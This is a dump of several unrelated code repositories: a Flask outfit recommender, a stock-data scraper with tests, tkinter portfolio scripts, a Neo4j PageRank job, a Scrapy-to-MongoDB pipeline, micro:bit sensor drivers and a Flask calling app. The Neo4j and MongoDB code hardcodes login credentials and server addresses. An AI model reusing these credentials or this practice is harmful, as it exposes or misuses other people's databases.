                               joggersIcon = joggers, sandalsIcon = sandals, miscShoes = miscellaneous_shoes, weather = weather, longPants = full_length,
shortPants = half_length)
else:
submitted_city = session.get('submitted_city', None)
result = m.getWeather(submitted_city)
random.seed(datetime.now())
random_num = random.randint(0, 4)
cold_footwear = ["Boots", "Hiking Boots", "Uggs", "Winter Moccasins", "Leather Shoes"]
cold_top = ["Jacket", "Parka", "Overcoat", "Jacket Shell", "Fur Coat"]
cold_accessories = ["Scarf", "Thermal Base Layers"]
cold_bottoms = ["Jeans", "Sweatpants", "Leggings", "Jeggings", "Khakis"]
mild_footwear = ["Running Shoes", "Dress Shoes", "Slip-On Casual Shoes", "Slides", "Heels"]
mild_top = ["T-Shirt", "Long-Sleeve Shirt", "Light Sweatshirt", "Jean Jacket", "Dress Shirt"]
mild_accessories = ["Baseball Cap", "Headband", "Bucket Hat", "Watch"]
mild_bottoms = ["Sweatpants", "Long Skirt", "Jeans", "Cargo Pants", "Dress Pants", "Leggings"]
hot_footwear = ["Flip-Flops", "Sandals", "Slides", "Running Shoes", "Slip-On Casual Shoes"]
hot_top = ["Tank Top", "T-Shirt", "Undershirt", "Polo", "Blouse"]
hot_accessories = ["Fan", "Water Bottle", "Sunscreen", "Sunglasses"]
hot_bottoms = ["Short Skirt", "Cargo Shorts", "Jean Shorts", "Trackpants", "Athletic Shorts"]
jackets = ["Jacket", "Parka", "Overcoat", "Jacket Shell", "Fur Coat", "Jean Jacket"]
t_shirt = ["T-Shirt", "Tank Top", "Undershirt", "Polo"]
long_sleeve_shirt = ["Long-Sleeve Shirt", "Light Sweatshirt", "Dress Shirt", "Blouse"]
boots = ["Boots", "Hiking Boots", "Uggs", "Leather Shoes"]
joggers = ["Running Shoes", "Slip-On Casual Shoes"]
sandals = ["Slides", "Flip-Flops", "Sandals"]
        miscellaneous_shoes = ["Winter Moccasins", "Dress Shoes", "Heels"]
full_length = ["Jeans", "Sweatpants", "Leggings", "Jeggings", "Khakis", "Long Skirt", "Cargo Pants", "Dress Pants", "Trackpants"]
half_length = ["Short Skirt", "Cargo Shorts", "Jean Shorts", "Athletic Shorts"]
weather = ["Thunderstorm", "Drizzle", "Rain", "Snow", "Atmosphere", "Clear", "Clouds"]
return render_template('outfits.html', city = submitted_city, result = result, randomInt = random_num, coldFootwear = cold_footwear,
coldBottoms = cold_bottoms, coldTop = cold_top, coldAccessories = cold_accessories,
mildFootwear = mild_footwear, mildTop = mild_top, mildAccessories = mild_accessories, mildBottoms = mild_bottoms,
hotFootwear = hot_footwear, hotTop = hot_top, hotAccessories = hot_accessories, hotBottoms = hot_bottoms,
jacketsIcon = jackets, tShirtIcon = t_shirt, longSleeveIcon = long_sleeve_shirt, bootsIcon = boots,
                               joggersIcon = joggers, sandalsIcon = sandals, miscShoes = miscellaneous_shoes, halfBottomsIcon = half_length,
fullBottomsIcon = full_length, weather = weather)
if __name__ == '__main__':
app.run(debug=False)
``` |
{
"source": "85599/TakeStock",
"score": 4
} |
#### File: TakeStock/src/QuarterlyReport.py
```python
__author__ = '<NAME>'
import datetime
import re
import bs4
import requests
def main():
pass
timeout = 3
def get_share_price(ticker=''):
"""
This function gets the share price for the given ticker symbol. It performs a request to the
    Yahoo Finance key statistics page and parses the response to find the share price.
:param ticker: The stock symbol/ticker to use for the lookup
:return: String containing the earnings date
"""
try:
earnings_url = 'https://finance.yahoo.com/q/ks?s=' + ticker.lower() + '+Key+Statistics'
request = requests.get(earnings_url, timeout=timeout)
soup = bs4.BeautifulSoup(request.text, 'html.parser')
# TODO replace magic string with reasonable/free API call
return '$' + soup.find('span', {'data-reactid': '50'}).text
except:
return 'No Data Found'
def get_earnings_date(ticker=''):
"""
This function gets the earnings date for the given ticker symbol. It performs a request to the
zacks url and parses the response to find the earnings date.
:param ticker: The stock symbol/ticker to use for the lookup
:return: String containing the earnings date
"""
try:
earnings_url = 'https://www.zacks.com/stock/quote/' + ticker.upper()
request = requests.get(earnings_url, timeout=timeout, headers={
'User-Agent': 'Mozilla'
})
soup = bs4.BeautifulSoup(request.text, 'html.parser')
# TODO replace magic string with reasonable/free API call
return soup.find('section', {'id': 'stock_key_earnings'}).find('table', attrs={'abut_bottom'}).find('tbody').findAll(
'tr')[4].findAll('td')[1].text.replace('*AMC', '')
except:
return 'No Data Found'
def get_fifty_two_week_high_low(ticker=''):
"""
This function gets the fifty-two week high and lows for the given ticker symbol. It performs a request to the
Yahoo url and parses the response to find the fifty-two week high and low.
:param ticker: The stock symbol/ticker to use for the lookup
:return: String containing the fifty two week high and low
"""
try:
earnings_url = 'https://finance.yahoo.com/q/ks?s=' + ticker.lower() + '+Key+Statistics'
request = requests.get(earnings_url, timeout=timeout)
soup = bs4.BeautifulSoup(request.text, 'html.parser')
# TODO replace magic string with reasonable/free API call
rows = soup.findAll('tr')
high, low = 0, 0
for row in rows:
if '52 Week High' in row.text:
high = row.contents[1].contents[0]
for row in rows:
if '52 Week Low' in row.text:
low = row.contents[1].contents[0]
return high + 'H ' + low + 'L'
except:
return 'No Data Found'
def get_trailing_pe_ratio(ticker=''):
"""
This function gets the trailing PE ratio for the given ticker symbol. It performs a request to the
Yahoo url and parses the response to find the trailing PE ratio.
:param ticker: The stock symbol/ticker to use for the lookup
:return: String containing the trailing PE ratio
"""
try:
key_stats_url = 'https://finance.yahoo.com/q/ks?s=' + ticker.lower() + '+Key+Statistics'
request = requests.get(key_stats_url, timeout=timeout)
soup = bs4.BeautifulSoup(request.text, 'html.parser')
return soup.find(text=re.compile('Trailing P/E')).findNext('td').text
except:
return 'No Data Found'
def get_peg_ratio(ticker=''):
"""
This function gets the PEG ratio for the given ticker symbol. It performs a request to the
Yahoo url and parses the response to find the PEG ratio.
:param ticker: The stock symbol/ticker to use for the lookup
:return: String containing the PEG ratio
"""
try:
key_stats_url = 'https://finance.yahoo.com/q/ks?s=' + ticker.lower() + '+Key+Statistics'
request = requests.get(key_stats_url, timeout=timeout)
soup = bs4.BeautifulSoup(request.text, 'html.parser')
return soup.find(text=re.compile('PEG Ratio')).findNext('td').text
except:
return 'No Data Found'
def get_rsi(ticker=''):
"""
This function gets the rsi for the given ticker symbol. It performs a request to the
nasdaq url and parses the response to find the rsi.
:param ticker: The stock symbol/ticker to use for the lookup
:return: String containing the rsi
"""
try:
rsi_url = 'https://charting.nasdaq.com/ext/charts.dll?2-1-14-0-0-512-03NA000000' + ticker.upper() \
+ '-&SF:1|27-SH:27=10-BG=FFFFFF-BT=0-WD=635-HT=395--XTBL-'
request = requests.get(rsi_url, timeout=timeout)
soup = bs4.BeautifulSoup(request.text, 'html.parser')
return soup.find_all('td', class_="DrillDownData")[1].text
except:
return 'No Data Found'
# def get_past_consensus_performance(ticker=''):
# TODO finish implementation
# """
# This function gets the past performance versus analyst consensus for the given ticker symbol.
# It performs a request to the nasdaq url and parses the response to get the data
# :param ticker: The stock symbol/ticker to use for the lookup
# :return: String containing the performance against consensus for past
# """
# try:
# earnings_url = 'https://www.nasdaq.com/symbol/' + ticker.lower() + '/earnings-surprise'
# request = requests.get(earnings_url)
# soup = bs4.BeautifulSoup(request.text, 'html.parser')
# # tag = soup.find(text=re.compile(''))
# # return tag[tag.index(':') + 1:].strip()
# except:
# return 'No Data Found'
def get_stocks(tickers=None):
"""
This function creates a list of Stock objects.
"""
stocks = []
for ticker in tickers:
stocks.append(
Stock(price=get_share_price(ticker), earnings_date=get_earnings_date(ticker=ticker),
ticker=ticker, pe_ratio=get_trailing_pe_ratio(ticker), peg_ratio=get_peg_ratio(ticker),
rsi=get_rsi(ticker=ticker), fifty_two=get_fifty_two_week_high_low(ticker=ticker)))
return stocks
class Stock:
"""
Defines a stock.
"""
def __init__(self, price=0, earnings_date='', ticker='', pe_ratio='', peg_ratio='', rsi='', fifty_two=''):
self.price = price
self.earnings_date = earnings_date
self.earnings_soon = False
if self.earnings_date:
if self.earnings_date != 'No Data Found':
dayStart = self.earnings_date[self.earnings_date.index('/') + 1:]
day = dayStart[:dayStart.index('/')]
earnings_date = datetime.date(year=int(self.earnings_date[len(self.earnings_date) - 2:]),
month=int(self.earnings_date[0:2].replace('/', '')),
day=int(day))
if 0 <= abs((earnings_date - datetime.date.today()).days) <= 7:
self.earnings_soon = True
self.ticker = ticker
self.pe_ratio = pe_ratio
self.peg_ratio = peg_ratio
self.rsi = rsi
self.fifty_two = fifty_two
if __name__ == "__main__":
# If the script is being invoked directly, run the main method.
main()
```
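A minimal usage sketch for the helpers above; it relies only on functions and `Stock` attributes defined in this file, and the import path mirrors the one used by the tests below.
```python
from src.QuarterlyReport import get_stocks
for stock in get_stocks(["AAPL", "MSFT"]):
    print(stock.ticker, stock.price, stock.pe_ratio, stock.peg_ratio, stock.rsi, stock.fifty_two)
    if stock.earnings_soon:
        print("  earnings expected on", stock.earnings_date)
```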
#### File: TakeStock/test/test_QuarterlyReport.py
```python
import unittest
from src import QuarterlyReport
testing_ticker = 'AAPL'
class QuarterlyReportTest(unittest.TestCase):
def test_get_share_price(self):
share_price = QuarterlyReport.get_share_price(testing_ticker)
self.assertIsNotNone(share_price)
self.assertIn('$', share_price)
def test_get_earnings_date(self):
self.assertIsNotNone(QuarterlyReport.get_earnings_date(testing_ticker))
def test_get_fifty_two_week_high_low(self):
hi_low = QuarterlyReport.get_fifty_two_week_high_low(testing_ticker)
self.assertIsNotNone(hi_low)
self.assertIn('H', hi_low)
self.assertIn('L', hi_low)
def test_get_trailing_pe_ratio(self):
pe = QuarterlyReport.get_trailing_pe_ratio(testing_ticker)
self.assertIsNotNone(pe)
self.assertTrue(is_numeric(float(pe)))
def test_get_peg_ratio(self):
peg = QuarterlyReport.get_peg_ratio(testing_ticker)
self.assertIsNotNone(peg)
self.assertTrue(is_numeric(float(peg)))
def test_get_rsi(self):
rsi = QuarterlyReport.get_rsi(testing_ticker)
self.assertIsNotNone(rsi)
self.assertTrue(is_numeric(float(rsi)))
def is_numeric(obj):
attrs = ['__add__', '__sub__', '__mul__', '__truediv__', '__pow__']
return all(hasattr(obj, attr) for attr in attrs)
if __name__ == '__main__':
unittest.main()
```
#### File: TakeStock/test/test_TakeStock.py
```python
import unittest
import time
from PyQt5.QtTest import QTest
from PyQt5.QtCore import Qt
from src.TakeStock import *
class MyFormTest(unittest.TestCase):
def test_defaults(self):
ticker = 'aapl'
harness = test_harness()
form = MyForm()
self.assertEqual(form.ticker_label.text(), "Ticker Entry")
QTest.keyClicks(form.ticker_entry, ticker)
QTest.mouseClick(form.search_tickers_button, Qt.LeftButton)
# Wait 10 seconds before timing out
trys = 0
while trys < 10:
trys += 1
time.sleep(1)
if form.results_table.item(0, 0) is not None:
break
        self.assertEqual(form.results_table.item(0, 0).text(), ticker)
```
#### File: TakeStock/test/test_TakeStock_Reporter.py
```python
import unittest
import getopt
import sys
from src import TakeStock_Reporter
class TakeStockReporterTest(unittest.TestCase):
def test_get_results(self):
test_ticker = 'AAPL'
result = TakeStock_Reporter.get_results(tickers=[test_ticker])[0]
self.assertIsNotNone(result)
self.assertEqual(result.price[0], '$')
self.assertGreater(float(result.price[1:]), 0)
self.assertGreater(float(result.rsi), 0)
self.assertIsNotNone(result.fifty_two)
self.assertIsNotNone(result.pe_ratio)
self.assertIsNotNone(result.peg_ratio)
if result.earnings_soon:
self.assertIsNotNone(result.earnings_date)
def test_opts(self):
# Override existing args for testing
sys.argv[1] = '-v'
sys.argv[2] = '-f'
sys.argv.append('-t AAPL')
sys.argv.append('-i')
sys.argv.append('-g')
sys.argv.append('-z')
sys.argv.append('-t AAPL')
TakeStock_Reporter.tickers = ['\'AAPL\'']
TakeStock_Reporter.main()
self.assertTrue(TakeStock_Reporter.verbose)
self.assertTrue(TakeStock_Reporter.fifty_two)
self.assertTrue(TakeStock_Reporter.rsi)
self.assertTrue(TakeStock_Reporter.pe_ratio)
self.assertTrue(TakeStock_Reporter.peg_ratio)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "85599/TharMax",
"score": 3
} |
#### File: 85599/TharMax/balance.py
```python
import pickle
import tkinter as tk
from tkinter import messagebox
class Portfolio:
def __init__(self, username, balance):
self.username = username
self.balance = balance
self.stock_list = {}
def add_balance_util(a, b):
s = int(b.get())
a.balance += s
filename = 'user_data/' + a.username + '.pkl'
pickle_out = open(filename, 'wb')
pickle.dump(a, pickle_out)
pickle_out.close()
messagebox.showinfo("Confirmation Message", str(s) + " was added to your account.")
def add_balance(x):
add_balance_window = tk.Tk()
add_balance_window.title('Adding balance to your account!')
add_balance_window.geometry('400x200')
add_balance_frame = tk.Frame(add_balance_window)
add_balance_frame.pack(side='top', fill='x')
add_balance_label = tk.Label(add_balance_frame, text='Enter the amount to add ')
add_balance_label.pack(side='left')
add_balance_entry = tk.Entry(add_balance_frame)
add_balance_entry.pack(side='left')
add_balance_button = tk.Button(add_balance_window, text='Ok',
command=lambda a=x, b=add_balance_entry: add_balance_util(a, b))
add_balance_button.pack(side='bottom', fill='x')
# Main entry point of this module (hence the name `start`); the username is passed in as `user` from the home screen.
def start(user):
temp = Portfolio('', 0)
filename = 'user_data/' + user + '.pkl'
file = open(filename, 'rb')
temp = pickle.load(file)
#closed the original loaded pickle user file.
file.close()
# temp has temporary variables extracted from pickled files. Successfully printed values.
# print(temp.username)
# print(temp.balance)
# print(temp.stock_list)
#Opening a new window layout
balance_window = tk.Tk()
balance_window.title('Your Account information!')
balance_window.geometry('300x300')
exit_button = tk.Button(balance_window, text='Exit', command=balance_window.destroy)
exit_button.pack(side='bottom', fill='x')
#Passing temp object as an argument (x) to permanently modify and write new balance value.
balance_button = tk.Button(balance_window, text='Add Balance', command=lambda x=temp: add_balance(x))
balance_button.pack(side='bottom', fill='x')
balance_label = tk.Label(balance_window, text='Your current balance is Rs ' + str(temp.balance))
balance_label.pack(side='bottom', fill='x')
balance_window.mainloop()
```
#### File: 85599/TharMax/sell.py
```python
import pickle
import tkinter as tk
import requests
from bs4 import BeautifulSoup
from tkinter import messagebox
class Portfolio:
def __init__(self, username, balance):
self.username = username
self.balance = balance
self.stock_list = {}
def on_sell_util(a, b, c, d):
unit = int(b.get())
    # The quantity entered must not exceed the quantity available in the portfolio
    if unit > a.stock_list[d]:
        messagebox.showinfo('Cannot sell', 'The quantity entered is more\nthan what you have!')
else:
# Balance update
a.balance = a.balance + (unit * c)
# Portfolio update
a.stock_list[d] -= unit
# Deleting the stock if it's quantity falls to 0
if a.stock_list[d] == 0:
del a.stock_list[d]
filename = 'user_data/' + a.username + '.pkl'
file = open(filename, 'wb')
# Storing updated values in pickled database.
pickle.dump(a, file)
file.close()
        success_text = 'Congratulations!\nYou have sold ' + str(unit) + ' units of ' + d
        messagebox.showinfo('Confirmation Message', success_text)
def on_sell_func(user, y):
#Gets the stock entered
my_stock = y.get()
#Loads the current user portfolio
temp = Portfolio('', 0)
filename = 'user_data/' + user + '.pkl'
file = open(filename, 'rb')
temp = pickle.load(file)
if my_stock not in temp.stock_list:
        messagebox.showinfo('Cannot sell', 'You do not own any units of ' + my_stock)
else:
#print('You do have this stock then. Let us sell it.')
try:
url = 'https://www.screener.in/company/' + my_stock
response = requests.get(url)
data = response.text
except requests.exceptions.RequestException as exp:
print(exp)
soup = BeautifulSoup(data, 'lxml')
data_items = soup.findAll('b')[1:2]
stock_data = [item.text for item in data_items]
current_price = stock_data[0]
current_price = current_price.replace(',', '')
        # sanitize the scraped price string into a numeric value
current_price = int(float(current_price))
#Created main window for selling function
on_sell_window = tk.Tk()
on_sell_window.geometry('400x200')
on_sell_window.title('Confirmation for selling ' + my_stock)
on_sell_frame = tk.Frame(on_sell_window)
on_sell_frame.pack(side='top')
quantity_label = tk.Label(on_sell_frame, text='Select quantity to sell ')
quantity_label.pack(side='left')
on_sell_entry = tk.Entry(on_sell_frame)
on_sell_entry.pack(side='left')
on_sell_frame.pack(side='top')
on_sell_button = tk.Button(on_sell_window, text='Sell now',
command=lambda a=temp, b=on_sell_entry, c=current_price, d=my_stock: on_sell_util(a, b,
c, d))
on_sell_button.pack(side='bottom')
on_sell_window.mainloop()
def start(user):
sell_window = tk.Tk()
sell_window.title('Sell a stock!')
sell_window.geometry('450x200')
sell_frame = tk.Frame(sell_window)
sell_label = tk.Label(sell_frame, text='Enter a stock to sell')
sell_label.pack(side='left')
sell_entry = tk.Entry(sell_frame)
sell_entry.pack(side='left')
sell_frame.pack(side='top')
sell_button = tk.Button(sell_window, text='Sell this stock', command=lambda x=user, y=sell_entry: on_sell_func(x, y))
sell_button.pack(side='bottom')
sell_window.mainloop()
``` |
{
"source": "855team/__Pedia-Search__",
"score": 3
} |
#### File: pagerank/impl/pagerank.py
```python
from py2neo import Graph, Node, Relationship
from py2neo.matching import *
import networkx as nx
def calcPR():
# print('start')
# fo = open("graph.txt", "w")
graph = Graph('bolt://192.168.3.11:10087', auth=('neo4j', 'pedia_search'))
G = nx.DiGraph()
node_matcher = NodeMatcher(graph)
nodes = node_matcher.match('Entry').all()
for node in nodes:
G.add_node(node['page_id'])
print("node page_id: ",node['page_id'])
print("number of nodes: ",G.number_of_nodes())
relationships = graph.match(nodes=None, r_type= 'linkTo', limit=None).all()
i = 0
print('start loop')
for relationship in relationships:
i = i + 1
print(i)
print(relationship)
start = relationship.start_node['page_id']
end = relationship.end_node['page_id']
print('edge: ',start,' -> ',end)
G.add_edge(*(start,end))
print('start pagerank')
result = nx.pagerank(G, alpha=0.85, personalization=None, max_iter=20000, tol=1e-06, weight='weight', dangling=None)
print(result)
print(sorted(result.items(), key=lambda kv: (kv[1], kv[0])))
i = 0
transaction = graph.begin()
for cur_page_id in result:
i = i + 1
weight = result[cur_page_id]
print("node:",i,cur_page_id,weight)
matcher = NodeMatcher(graph)
node = matcher.match(page_id = cur_page_id).first()
        # update the node
        node['weight'] = weight  # store the new PageRank weight
transaction.push(node)
transaction.commit()
# # build an empty graph
# G=nx.DiGraph()
# # add nodes to the graph
# pages = ["1","2","3","4"]
# G.add_nodes_from(pages)
#
# # add edges to the graph; nodes are created implicitly, so they need not be added first
# G.add_edges_from([('1','2'), ('1','4'),('1','3'), ('4','1'),('2','3'),('2','4'),('3','1'),('4','3')])
#
#
#
#
# # alternative: pagerank or pagerank_numpy can be used instead
# result = nx.pagerank_scipy(G, alpha=0.85, personalization=None, max_iter=100, tol=1e-06, weight='weight', dangling=None)
# print(result)
calcPR()
```
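The heart of `calcPR` is the `networkx` PageRank call; a self-contained toy version of that step, independent of Neo4j, looks roughly like this:
```python
import networkx as nx
G = nx.DiGraph()
# nodes are created implicitly when edges are added
G.add_edges_from([("1", "2"), ("1", "3"), ("2", "3"), ("3", "1"), ("4", "3")])
# same damping factor (alpha=0.85) as in calcPR above
scores = nx.pagerank(G, alpha=0.85)
print(sorted(scores.items(), key=lambda kv: kv[1], reverse=True))
```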
#### File: wiki/wiki/pipelines.py
```python
import pymongo
import csv
from itemadapter import ItemAdapter
from twisted.internet.threads import deferToThread
from py2neo import Graph, Node, Relationship
class WikiPipeline:
def open_spider(self, spider):
headers = ['page_id:ID', 'title', 'weight']
# self.node_csv_file = open('./dump/test_node.csv', 'w+')
# self.relation_csv_file = open('./dump/test_relation.csv', 'w+')
# self.node_csv = csv.writer(self.node_csv_file)
self.mongo_client = pymongo.MongoClient('mongodb://pedia_search_mongo_rw:[email protected]:10086/pedia_search')
def close_spider(self, spider):
open('a.txt', 'w')
print('\n\nclosing!!!!!!!!!!!\n\n')
self.mongo_client.close()
def process_item(self, item, spider):
item_dict = ItemAdapter(item).asdict()
# MongoDB Server
# client = pymongo.MongoClient('mongodb://pedia_search_mongo_rw:[email protected]:10086/pedia_search')
mongo = self.mongo_client['pedia_search']['pedia_search']
mongo.insert_one(item_dict)
#
# Neo4j Server
# graph = Graph('bolt://172.16.17.32:10087', auth=('neo4j', 'pedia_search'))
# transaction = graph.begin()
#
# node_from = Node('Entry', page_id=item_dict['page_id'], title=item_dict['title'], weight=0.0)
#
# for item in item_dict['linked_items']:
# node_to = Node('Entry', page_id=item['page_id'], title=item['title'], weight=0.0)
# transaction.merge(Relationship(node_from, 'linkTo', node_to), primary_label='Entry', primary_key='page_id')
#
# transaction.commit()
# return item
return {'page_id:ID': item_dict['page_id'], 'title': item_dict['title'], 'weight': 0.0}
``` |
{
"source": "859462029/microbit-lib",
"score": 2
} |
#### File: OLED/OLED12864_I2C_6x8/OLED12864_I2C_6x8.py
```python
from microbit import i2c
import gc
cmd = [
[0xAE],
[0xA4],
[0xD5, 0xF0],
[0xA8, 0x3F],
[0xD3, 0x00],
    [0x40 | 0x0],
[0x8D, 0x14],
[0x20, 0x00],
[0x21, 0, 127],
[0x22, 0, 63],
[0xa0 | 0x1],
[0xc8],
[0xDA, 0x12],
[0x81, 0xCF],
[0xd9, 0xF1],
[0xDB, 0x40],
[0xA6],
[0xd6, 0],
[0xaf]
]
# ' ' - '~' 0x20 - 0x7F
Font_5x7 = bytes(b'\
\x00\x00\x00\x00\x00\
\x00\x00\x5F\x00\x00\
\x00\x07\x00\x07\x00\
\x14\x7F\x14\x7F\x14\
\x24\x2A\x07\x2A\x12\
\x23\x13\x08\x64\x62\
\x37\x49\x55\x22\x50\
\x00\x05\x03\x00\x00\
\x00\x1C\x22\x41\x00\
\x00\x41\x22\x1C\x00\
\x08\x2A\x1C\x2A\x08\
\x08\x08\x3E\x08\x08\
\x00\x50\x30\x00\x00\
\x08\x08\x08\x08\x08\
\x00\x60\x60\x00\x00\
\x20\x10\x08\x04\x02\
\x3E\x51\x49\x45\x3E\
\x00\x42\x7F\x40\x00\
\x42\x61\x51\x49\x46\
\x21\x41\x45\x4B\x31\
\x18\x14\x12\x7F\x10\
\x27\x45\x45\x45\x39\
\x3C\x4A\x49\x49\x30\
\x01\x71\x09\x05\x03\
\x36\x49\x49\x49\x36\
\x06\x49\x49\x29\x1E\
\x00\x36\x36\x00\x00\
\x00\x56\x36\x00\x00\
\x00\x08\x14\x22\x41\
\x14\x14\x14\x14\x14\
\x41\x22\x14\x08\x00\
\x02\x01\x51\x09\x06\
\x32\x49\x79\x41\x3E\
\x7E\x11\x11\x11\x7E\
\x7F\x49\x49\x49\x36\
\x3E\x41\x41\x41\x22\
\x7F\x41\x41\x22\x1C\
\x7F\x49\x49\x49\x41\
\x7F\x09\x09\x01\x01\
\x3E\x41\x41\x51\x32\
\x7F\x08\x08\x08\x7F\
\x00\x41\x7F\x41\x00\
\x20\x40\x41\x3F\x01\
\x7F\x08\x14\x22\x41\
\x7F\x40\x40\x40\x40\
\x7F\x02\x04\x02\x7F\
\x7F\x04\x08\x10\x7F\
\x3E\x41\x41\x41\x3E\
\x7F\x09\x09\x09\x06\
\x3E\x41\x51\x21\x5E\
\x7F\x09\x19\x29\x46\
\x46\x49\x49\x49\x31\
\x01\x01\x7F\x01\x01\
\x3F\x40\x40\x40\x3F\
\x1F\x20\x40\x20\x1F\
\x7F\x20\x18\x20\x7F\
\x63\x14\x08\x14\x63\
\x03\x04\x78\x04\x03\
\x61\x51\x49\x45\x43\
\x00\x00\x7F\x41\x41\
\x02\x04\x08\x10\x20\
\x41\x41\x7F\x00\x00\
\x04\x02\x01\x02\x04\
\x40\x40\x40\x40\x40\
\x00\x01\x02\x04\x00\
\x20\x54\x54\x54\x78\
\x7F\x48\x44\x44\x38\
\x38\x44\x44\x44\x20\
\x38\x44\x44\x48\x7F\
\x38\x54\x54\x54\x18\
\x08\x7E\x09\x01\x02\
\x08\x14\x54\x54\x3C\
\x7F\x08\x04\x04\x78\
\x00\x44\x7D\x40\x00\
\x20\x40\x44\x3D\x00\
\x00\x7F\x10\x28\x44\
\x00\x41\x7F\x40\x00\
\x7C\x04\x18\x04\x78\
\x7C\x08\x04\x04\x78\
\x38\x44\x44\x44\x38\
\x7C\x14\x14\x14\x08\
\x08\x14\x14\x18\x7C\
\x7C\x08\x04\x04\x08\
\x48\x54\x54\x54\x20\
\x04\x3F\x44\x40\x20\
\x3C\x40\x40\x20\x7C\
\x1C\x20\x40\x20\x1C\
\x3C\x40\x30\x40\x3C\
\x44\x28\x10\x28\x44\
\x0C\x50\x50\x50\x3C\
\x44\x64\x54\x4C\x44\
\x00\x08\x36\x41\x00\
\x00\x00\x7F\x00\x00\
\x00\x41\x36\x08\x00\
\x02\x01\x02\x04\x02\
')
ADDR = 0x3C
gc.collect()
screen = bytearray(1025)
screen[0] = 0x40
class OLED12864_I2C_6x8():
def __init__(self):
self.x = 0
self.y = 0
for c in cmd:
self.command(c)
def command(self, c):
i2c.write(ADDR, b'\x00' + bytearray(c))
def set_pos(self, col=0, page=0):
self.command([0xb0 | page])
c1, c2 = col & 0x0F, col >> 4
self.command([0x00 | c1])
self.command([0x10 | c2])
def pixel(self, x, y, color=1):
page, shift_page = divmod(y, 8)
ind = x + page * 128 + 1
b = screen[ind] | (1 << shift_page) if color else screen[ind] & ~ (1 << shift_page)
screen[ind] = b
self.set_pos(x, page)
i2c.write(ADDR, bytearray([0x40, b]))
def invert(self, v=1):
n = 0xa7 if v else 0xa6
self.command([n])
def on(self):
self.command([0xAF])
def off(self):
self.command([0xAE])
def clear(self, c=0):
global screen
for i in range(1, 1025):
screen[i] = 0
self.draw()
def draw(self):
self.set_pos()
i2c.write(ADDR, screen)
def char(self, ch, x=0, y=0, c=1):
ind = x + y * 128 + 1
n = (min(127, max(ord(ch), 32)) -32)*5
for i in range(5):
screen[ind+i] = Font_5x7[n+i] if c else Font_5x7[n+i]^0xFF
screen[ind+5] = 0 if c else 0xFF
self.set_pos(x, y)
i2c.write(ADDR, b'\x40' + screen[ind:ind + 6])
def print(self, s, c=1, newline=1):
x, y = self.x, self.y
for i in range(len(s)):
self.char(s[i], x, y, c)
x += 6
if x > 125:
x = 0; y = (y+1)%8
if newline:
x = 0; y = (y+1)%8
self.x, self.y = x, y
```
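A short usage sketch for the driver above, assuming the file is copied to the micro:bit as `OLED12864_I2C_6x8.py` and a 128x64 SSD1306 display is wired to the default I2C pins at address 0x3C:
```python
from OLED12864_I2C_6x8 import OLED12864_I2C_6x8
oled = OLED12864_I2C_6x8()
oled.clear()
oled.print("Hello, micro:bit")   # 6x8 font: 21 characters per line, 8 lines
oled.pixel(64, 32, 1)            # light a single pixel near the centre
```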
#### File: sensor/bmp180/BMP180.py
```python
from microbit import *
BMP180_I2C_ADDR = 0x77
class BMP180():
def __init__(self):
self.AC1 = self.short(self._g2r(0xAA))
self.AC2 = self.short(self._g2r(0xAC))
self.AC3 = self.short(self._g2r(0xAE))
self.AC4 = self._g2r(0xB0)
self.AC5 = self._g2r(0xB2)
self.AC6 = self._g2r(0xB4)
self.B1 = self.short(self._g2r(0xB6))
self.B2 = self.short(self._g2r(0xB8))
self.MB = self.short(self._g2r(0xBA))
self.MC = self.short(self._g2r(0xBC))
self.MD = self.short(self._g2r(0xBE))
self.UT = 0
self.UP = 0
self.T = 0
self.P = 0
self.version = '2.2'
def short(self, dat):
if dat > 32767:
return dat - 65536
else:
return dat
# set reg
def _sr(self, reg, dat):
i2c.write(BMP180_I2C_ADDR, bytearray([reg, dat]))
# get two reg
def _g2r(self, reg):
i2c.write(BMP180_I2C_ADDR, bytearray([reg]))
t = i2c.read(BMP180_I2C_ADDR, 2)
return t[0]*256 + t[1]
# get Temperature and Pressure
def get(self):
# start measure
self._sr(0xF4, 0x2E)
sleep(6)
self.UT = self._g2r(0xF6)
self._sr(0xF4, 0x34)
sleep(6)
self.UP = self._g2r(0xF6)
# calc
X1 = (self.UT - self.AC6) * self.AC5/(1<<15)
X2 = self.MC * (1<<11) / (X1 + self.MD)
B5 = X1 + X2
self.T = (B5 + 8)/160
B6 = B5 - 4000
X1 = (self.B2 * (B6*B6/(1<<12))) / (1<<11)
X2 = (self.AC2 * B6)/(1<<11)
X3 = X1 + X2
B3 = ((self.AC1*4+X3) + 2)/4
X1 = self.AC3 * B6 / (1<<13)
X2 = (self.B1 * (B6*B6/(1<<12))) / (1<<16)
X3 = (X1 + X2 + 2)/4
B4 = self.AC4 * (X3 + 32768)/(1<<15)
B7 = (self.UP-B3) * 50000
if B7 < 0x80000000:
p = (B7*2)/B4
else:
p = (B7/B4) * 2
X1 = (p/(1<<8))*(p/(1<<8))
X1 = (X1 * 3038)/(1<<16)
X2 = (-7357*p)/(1<<16)
self.P = p + (X1 + X2 + 3791)/16
return [self.T, self.P]
# get Temperature in Celsius
def Temperature(self):
self.get()
return self.T
# get Pressure in Pa
def Pressure(self):
self.get()
return self.P
# Calculating absolute altitude
def Altitude(self):
self.get()
return 44330*(1-(self.P/101325)**(1/5.255))
```
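A usage sketch for the class above, assuming the file is saved on the micro:bit as `BMP180.py` and the sensor sits on the I2C bus at address 0x77:
```python
from microbit import sleep
from BMP180 import BMP180
bmp = BMP180()
while True:
    t, p = bmp.get()   # temperature in Celsius, pressure in Pa
    print("T=%.1f C  P=%.0f Pa  Alt=%.1f m" % (t, p, bmp.Altitude()))
    sleep(2000)
```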
#### File: sensor/HCSR04/hcsr04.py
```python
from microbit import *
from time import sleep_us
from machine import time_pulse_us
def distance(tp, ep):
ep.read_digital()
tp.write_digital(1)
sleep_us(10)
tp.write_digital(0)
ts = time_pulse_us(ep, 1, 5000)
if ts > 0: return ts * 17 // 100
return ts
``` |
{
"source": "85-hub/callaborate",
"score": 3
} |
#### File: 85-hub/callaborate/app.py
```python
from datetime import datetime, timedelta
import hashlib
import os
import urllib
from functools import wraps
from flask import Flask, jsonify, request
from flask.ext.cors import cross_origin
import requests
import calls
import config
import db
from db import store_event, get_next_callee, CALLEES
app = Flask(__name__, static_folder='static', static_url_path='')
SECRET = config.get('SECRET')
def create_key(index):
"""Hash a secret to create a key signature for an index"""
s = hashlib.sha1()
s.update('{}:{}'.format(SECRET, index))
return s.hexdigest()
def check_key(index, key):
return create_key(index) == key
def timeblock(inner_fn):
@wraps(inner_fn)
